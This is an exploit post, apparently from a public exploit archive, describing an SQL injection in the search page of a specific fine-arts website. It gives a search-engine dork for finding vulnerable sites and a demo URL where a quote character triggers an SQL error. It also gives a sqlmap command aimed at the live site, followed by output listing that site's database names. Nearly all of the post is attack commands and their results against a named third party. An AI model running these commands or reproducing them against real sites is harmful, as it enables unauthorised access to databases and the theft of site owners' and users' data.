# Exploit Title:Haddad's Fine SQL Injection
--------------------------------------------------------------------------------------------------------
# Date:29.05.2019
--------------------------------------------------------------------------------------------------------

# Dork :intitle:"Haddad's Fine Arts - Search"
--------------------------------------------------------------------------------------------------------

# Exploit Author:Cerkuday
--------------------------------------------------------------------------------------------------------

# Tested on:Windows &Kali Linux
--------------------------------------------------------------------------------------------------------

#Demo:

http://haddadsfinearts.com/search.php?id=02'
You have an error in your SQL syntax

--------------------------------------------------------------------------------------------------------


PoC 

sqlmap.py -u "http://haddadsfinearts.com/search.php?id=02" --text-only  --random-agent --dbs

[*] creativeart
[*] curatedimage
[*] giclee
[*] gicleephoto
[*] gicleestudio
[*] haddads
[*] haddadsfinearts
[*] information_schema
[*] mysql
[*] ofmaker
[*] performance_schema
[*] photo_canvas
[*] photocanvas